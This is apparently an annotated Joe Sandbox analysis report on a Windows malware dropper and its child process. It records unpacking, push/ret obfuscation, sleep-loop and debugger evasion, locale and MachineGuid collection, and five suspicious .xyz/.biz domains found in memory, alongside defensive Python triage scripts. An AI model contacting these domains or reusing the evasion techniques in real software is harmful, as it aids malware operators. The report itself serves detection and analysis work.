                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

                  Data Obfuscation

                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Unpacked PE file: 3.2.1A68.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Unpacked PE file: 0.2.rHrG691f7q.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Unpacked PE file: 3.2.1A68.tmp.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_00410766 push ecx; ret 0_2_00410779
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_009FF14A pushad ; ret 0_2_009FF166
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_009FF2C8 push ecx; ret 0_2_009FF2E5
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_009FC69C pushad ; ret 0_2_009FC6C4
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_009FCB3D push 00000003h; ret 0_2_009FCB41
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_009FAD92 push es; iretd 0_2_009FADA3
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_024D09CD push ecx; ret 0_2_024D09E0
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_024F799F push esp; retf 0_2_024F79A7
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_024DCE18 push ss; retf 0_2_024DCE1D
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_024CFFF3 push ecx; ret 0_2_024D0006
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_024F7F9D push esp; retf 0_2_024F7F9E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_0041ACF6 push esp; iretd 3_2_0041ACFF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_0043F6EE push esp; iretd 3_2_0043F6EF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_0043BF00 push eax; mov dword ptr [esp], 49484716h 3_2_0043BF01
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_008CD0BD pushad ; ret 3_2_008CD0C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_008CD343 push ebp; ret 3_2_008CD348
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024CC167 push eax; mov dword ptr [esp], 49484716h 3_2_024CC168
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024CF555 push esp; iretd 3_2_024CF556
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Code function: 3_2_024AAF5D push esp; iretd 3_2_024AAF66
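The push/ret hits above are raw disassembly pattern matches. As a worked illustration, added here and not part of the Joe Sandbox report, the Python below scans a 32-bit code blob for the same idioms at the byte level and decodes the hidden target where there is one: push imm32; ret (a jump with no jmp instruction), push reg; mov dword ptr [esp], imm32 (the same trick with the immediate moved out of the push, the shape reported at 3_2_0043BF00 with 49484716h) and push reg; ret. Two caveats a reviewer should apply to the report's list: push ecx; ret is also the tail of MSVC's __EH_epilog3 and __SEH_epilog4 helpers, so on its own it is a weak indicator, and sequences such as push esp; iretd or push es; retf are privileged or nonsensical in user-mode code and almost always come from disassembling data or a misaligned byte stream. The sample bytes, the 0x400000 base and the confidence labels are assumptions for the example.

```python
import struct

# One-byte opcodes 0x50..0x57 are push eax..push edi in 32-bit mode.
PUSH_REG = range(0x50, 0x58)
REG_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET = 0xC3
PUSH_IMM32 = 0x68
MOV_ESP_IMM32 = b"\xC7\x04\x24"   # mov dword ptr [esp], imm32 (C7 /0, ModRM 04, SIB 24)


def find_push_ret_gadgets(code: bytes, base: int = 0x400000) -> list:
    """Byte-level scan for push/ret control-flow idioms in a 32-bit code blob.

    Returns one dict per hit with the virtual address (base + offset), the
    idiom kind, the decoded immediate where there is one and a confidence
    label. No real disassembly is done, so hits inside data or in the middle
    of longer instructions are possible; confirm low-confidence hits in a
    disassembler before reporting them.
    """
    hits = []
    n = len(code)
    i = 0
    while i < n:
        b = code[i]
        # push imm32 ; ret  ->  unconditional jump to imm32 that produces no
        # call/jmp cross-reference.
        if b == PUSH_IMM32 and i + 5 < n and code[i + 5] == RET:
            target = struct.unpack_from("<I", code, i + 1)[0]
            hits.append({"va": base + i, "kind": "push_imm_ret",
                         "target": target, "confidence": "high"})
            i += 6
            continue
        # push reg ; mov dword ptr [esp], imm32  ->  same effect as push imm32,
        # split so the immediate is not adjacent to a push opcode.
        if b in PUSH_REG and code[i + 1:i + 4] == MOV_ESP_IMM32 and i + 8 <= n:
            imm = struct.unpack_from("<I", code, i + 4)[0]
            hits.append({"va": base + i, "kind": "push_reg_mov_esp",
                         "reg": REG_NAMES[b - 0x50], "imm": imm,
                         "ret_follows": i + 8 < n and code[i + 8] == RET,
                         "confidence": "high"})
            i += 8
            continue
        # push reg ; ret  ->  jump through a register, but also the tail of
        # MSVC's __EH_epilog3 / __SEH_epilog4 helpers, hence low confidence.
        if b in PUSH_REG and i + 1 < n and code[i + 1] == RET:
            hits.append({"va": base + i, "kind": "push_reg_ret",
                         "reg": REG_NAMES[b - 0x50], "confidence": "low"})
            i += 2
            continue
        i += 1
    return hits


# Constructed sample, not bytes from the analysed file: an ordinary prologue,
# the three idioms above and an MSVC-style epilog tail.
SAMPLE_CODE = (
    b"\x55\x8b\xec"                          # push ebp ; mov ebp, esp
    + b"\x68\x00\x10\x40\x00\xc3"            # push 0x401000 ; ret
    + b"\x90\x90"                            # nop ; nop
    + b"\x50\xc7\x04\x24\x16\x47\x48\x49"    # push eax ; mov dword ptr [esp], 0x49484716
    + b"\xc3"                                # ret
    + b"\x8b\xe5\x5d\x51\xc3"                # mov esp, ebp ; pop ebp ; push ecx ; ret
)


if __name__ == "__main__":
    for hit in find_push_ret_gadgets(SAMPLE_CODE):
        print(hit)
```

To run it over a real unpacked image, pass the bytes of the .text section and its virtual address as base; the scanner is a triage filter, and every high-confidence hit still needs its ret target checked against the image's section map.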
                  Source: rHrG691f7q.exe | Static PE information: section name: .text entropy: 7.548735116985004
                  Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .text entropy: 7.371146835595198
                  Source: 1A68.tmp.exe.0.dr | Static PE information: section name: .text entropy: 7.371146835595198
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | File created: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
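The .text entropy figures above (7.55 and 7.37 bits per byte) are the static signal behind the unpacking verdicts earlier in this section. The Python below is added here as an example and is not code from the report or from the sample: it parses the section table of a PE32/PE32+ image by hand, computes Shannon entropy per section, renders the section rights in the report's own E/R/W notation and flags code sections that are both high-entropy and executable, plus the writable-code case an in-place unpacker needs. The 7.0 cut-off, the constructed two-section test image and its payloads are assumptions for the example.

```python
import math
import random
import struct

# File and section characteristic bits from winnt.h.
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumed cut-off: compiler-emitted x86 code usually sits around 6.0-6.7
# bits/byte; compressed or encrypted payloads push a code section above 7.0.
PACKED_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def rights(flags: int) -> str:
    """Rights string in the report's notation (E=execute, R=read, W=write)."""
    return ("E" if flags & IMAGE_SCN_MEM_EXECUTE else "") + \
           ("R" if flags & IMAGE_SCN_MEM_READ else "") + \
           ("W" if flags & IMAGE_SCN_MEM_WRITE else "")


def analyze_pe(image: bytes) -> dict:
    """Walk the section table of a PE32/PE32+ image and score each section."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size, file_flags = struct.unpack_from("<HH", image, coff + 16)
    table = coff + 20 + opt_size          # section headers follow the optional header
    sections = []
    for k in range(nsections):
        (name, _vsize, _va, raw_size, raw_ptr,
         _preloc, _pline, _nreloc, _nline, flags) = struct.unpack_from("<8s6I2HI", image, table + 40 * k)
        ent = shannon_entropy(image[raw_ptr:raw_ptr + raw_size])
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "rights": rights(flags),
            "entropy": ent,
            # High entropy in a code section is the packed-file signal.
            "packed": bool(flags & IMAGE_SCN_CNT_CODE) and ent >= PACKED_THRESHOLD,
            # Writable code is what an in-place unpacker rewrites at run time.
            "writable_code": bool(flags & IMAGE_SCN_MEM_EXECUTE) and bool(flags & IMAGE_SCN_MEM_WRITE),
        })
    return {"relocs_stripped": bool(file_flags & IMAGE_FILE_RELOCS_STRIPPED),
            "sections": sections}


def build_test_pe(text_bytes: bytes, data_bytes: bytes) -> bytes:
    """Constructed two-section PE32 header around the given payloads (not runnable as a program)."""
    e_lfanew, opt_size, text_ptr = 0x40, 224, 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine i386, 2 sections, optional header size, RELOCS_STRIPPED|EXECUTABLE_IMAGE|32BIT_MACHINE.
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0103)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)      # PE32 magic, rest zeroed
    data_ptr = text_ptr + len(text_bytes)
    sec = struct.pack("<8s6I2HI", b".text", len(text_bytes), 0x1000, len(text_bytes), text_ptr, 0, 0, 0, 0,
                      IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    sec += struct.pack("<8s6I2HI", b".data", len(data_bytes), 0x3000, len(data_bytes), data_ptr, 0, 0, 0, 0,
                       IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    headers = dos + b"PE\0\0" + coff + opt + sec
    return headers.ljust(text_ptr, b"\0") + text_bytes + data_bytes


def sample_report() -> dict:
    """Analyse a constructed image: pseudo-random (packed-looking) .text, two-valued .data."""
    rng = random.Random(7)
    packed_text = bytes(rng.getrandbits(8) for _ in range(4096))
    plain_data = b"\0" * 2048 + b"A" * 2048
    return analyze_pe(build_test_pe(packed_text, plain_data))


if __name__ == "__main__":
    report = sample_report()
    print("relocs stripped:", report["relocs_stripped"])
    for s in report["sections"]:
        print(f'{s["name"]:8} {s["rights"]:3} entropy={s["entropy"]:.3f} packed={s["packed"]}')
```

On the real file the same walk reproduces the report's RELOCS_STRIPPED flag and the .text rights of ER; a pre-unpacking .text at 7.55 next to a post-unpacking dump with ordinary code entropy is the pair of numbers that justifies the "Unpacked PE file" entries.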
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences)
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Window / User API: threadDelayed 804
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Window / User API: threadDelayed 9183
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-65085)
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | API coverage: 5.1 %
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe TID: 7748 | Thread sleep count: 804 > 30
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe TID: 7748 | Thread sleep time: -580488s >= -30000s
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe TID: 7748 | Thread sleep count: 9183 > 30
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe TID: 7748 | Thread sleep time: -6630126s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe TID: 7912 | Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Last function: Thread delayed
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Last function: Thread delayed
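The sleep statistics above fit a single delay loop: 804 × 722 = 580,488 and 9,183 × 722 = 6,630,126, so thread 7748 sleeps a constant 722 (units as reported) per iteration, and the "GetSystemTimeAsFileTime, DecisionNodes" chain means a clock value feeds a branch, which is what a sleep-skip check looks like. The Python below is added here as an example and is not part of the report: it applies the report's own thresholds (more than 30 sleep calls, or a total of 30,000 or more) to a per-thread API trace and additionally flags a clock-sleep-clock sequence on one thread. The trace format (tid api [arg]), the API name sets and the sample trace are constructed for the example; the sample trace's counts mirror the report's figures.

```python
from collections import defaultdict

# APIs that stall the calling thread (the report's "threadDelayed"/"Thread sleep" events).
SLEEP_APIS = {"Sleep", "SleepEx", "NtDelayExecution"}
# Clock reads a sample compares before and after a sleep to spot sleep acceleration.
CLOCK_APIS = {"GetTickCount", "GetTickCount64", "GetSystemTimeAsFileTime",
              "QueryPerformanceCounter", "timeGetTime"}
# Thresholds taken from the report's own wording ("804 > 30", ">= 30000").
MAX_SLEEP_CALLS = 30
MAX_TOTAL_DELAY = 30000


def parse_trace(text: str) -> list:
    """Parse 'tid api [arg]' lines into (tid, api, arg) tuples; '#' starts a comment."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        arg = int(parts[2]) if len(parts) > 2 else None
        events.append((int(parts[0]), parts[1], arg))
    return events


def _fresh_thread() -> dict:
    return {"sleep_calls": 0, "total_delay": 0, "timing_check": False,
            "state": "idle", "flags": []}


def score_threads(events: list) -> dict:
    """Per-thread sleep statistics plus a clock -> sleep -> clock pattern detector."""
    threads = defaultdict(_fresh_thread)
    for tid, api, arg in events:
        t = threads[tid]
        if api in CLOCK_APIS:
            # A clock read right after a clock-bracketed sleep: the thread is
            # measuring how long the sleep really took.
            if t["state"] == "clock_sleep":
                t["timing_check"] = True
            t["state"] = "clock"
        elif api in SLEEP_APIS:
            t["sleep_calls"] += 1
            t["total_delay"] += arg or 0
            t["state"] = "clock_sleep" if t["state"] == "clock" else "idle"
        else:
            t["state"] = "idle"
    for t in threads.values():
        if t["sleep_calls"] > MAX_SLEEP_CALLS:
            t["flags"].append("sleep_loop")
        if t["total_delay"] >= MAX_TOTAL_DELAY:
            t["flags"].append("long_delay")
        if t["timing_check"]:
            t["flags"].append("sleep_skip_check")
        del t["state"]
    return dict(threads)


def build_sample_trace() -> str:
    """Constructed trace (not sandbox output): 804 sleeps of 722 on one thread,
    one 120000 sleep bracketed by clock reads, and a short benign thread."""
    lines = ["# tid api [arg]"]
    lines += ["7748 Sleep 722"] * 804
    lines += ["7912 GetTickCount", "7912 Sleep 120000", "7912 GetTickCount"]
    lines += ["100 Sleep 10"] * 3
    return "\n".join(lines)


if __name__ == "__main__":
    for tid, info in sorted(score_threads(parse_trace(build_sample_trace())).items()):
        print(tid, info)
```

The count threshold catches the tight 722-unit loop even when each individual sleep is short enough to slip under a per-call limit; the clock bracket is the signal that separates a sample that merely waits from one that checks whether the wait was honoured.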
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_004389F2 FindFirstFileExW
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_024F8C59 FindFirstFileExW
                  Source: Amcache.hve.10.dr | Binary or memory string: VMware
                  Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.10.dr | Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.10.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.10.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.10.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.10.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                  Source: rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433623776.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.10.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.10.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.10.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.10.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.10.dr | Binary or memory string: vmci.sys
                  Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.10.dr | Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.10.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1
                  Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.10.dr | Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.10.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.10.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.10.dr | Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.10.dr | Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.10.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.10.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Note: Amcache.hve.10.dr is the analysis host's own Amcache hive, collected by WerFault.exe (process 10) as part of the crash report for 1A68.tmp.exe. The VMware and Hyper-V strings attributed to it describe the sandbox VM's hardware inventory, not strings carried or looked up by the sample; only the "Hyper-V RAW" string above, found in the sample's and the child's process memory, is evidence from the sample itself.
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043A9B0 LdrInitializeThunk,3_2_0043A9B0
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_009F9823 push dword ptr fs:[00000030h]0_2_009F9823
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024F00C6 mov eax, dword ptr fs:[00000030h]0_2_024F00C6
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024C092B mov eax, dword ptr fs:[00000030h]0_2_024C092B
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024C0D90 mov eax, dword ptr fs:[00000030h]0_2_024C0D90
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_008C9F4B push dword ptr fs:[00000030h]3_2_008C9F4B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0249092B mov eax, dword ptr fs:[00000030h]3_2_0249092B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_02490D90 mov eax, dword ptr fs:[00000030h]3_2_02490D90
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024EA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024EA63A
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024D073A
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024CFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_024CFB78
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D08CD SetUnhandledExceptionFilter,0_2_024D08CD

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 1A68.tmp.exe | String found in binary or memory: debonairnukk.xyz
                  Source: 1A68.tmp.exe | String found in binary or memory: diffuculttan.xyz
                  Source: 1A68.tmp.exe | String found in binary or memory: effecterectz.xyz
                  Source: 1A68.tmp.exe | String found in binary or memory: deafeninggeh.biz
                  Source: 1A68.tmp.exe | String found in binary or memory: immureprech.biz
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Process created: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe "C:\Users\user\AppData\Local\Temp\1A68.tmp.exe"
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_0041077B cpuid 0_2_0041077B
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0043B00A
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetLocaleInfoW, 0_2_004351C0
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: EnumSystemLocalesW, 0_2_0043B2CD
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: EnumSystemLocalesW, 0_2_0043B282
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: EnumSystemLocalesW, 0_2_0043B368
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0043B3F5
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetLocaleInfoW, 0_2_0043B645
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0043B76E
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetLocaleInfoW, 0_2_0043B875
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0043B942
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: EnumSystemLocalesW, 0_2_00434DCD
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_024FB271
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: EnumSystemLocalesW, 0_2_024F5034
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetLocaleInfoW, 0_2_024F5427
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: EnumSystemLocalesW, 0_2_024FB4E9
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: EnumSystemLocalesW, 0_2_024FB534
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: EnumSystemLocalesW, 0_2_024FB5CF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetLocaleInfoW, 0_2_024FBADC
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_024FBBA9
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetLocaleInfoW, 0_2_024FB8AC
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_024FB9D5
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_004103CD
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8, 0_2_004163EA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
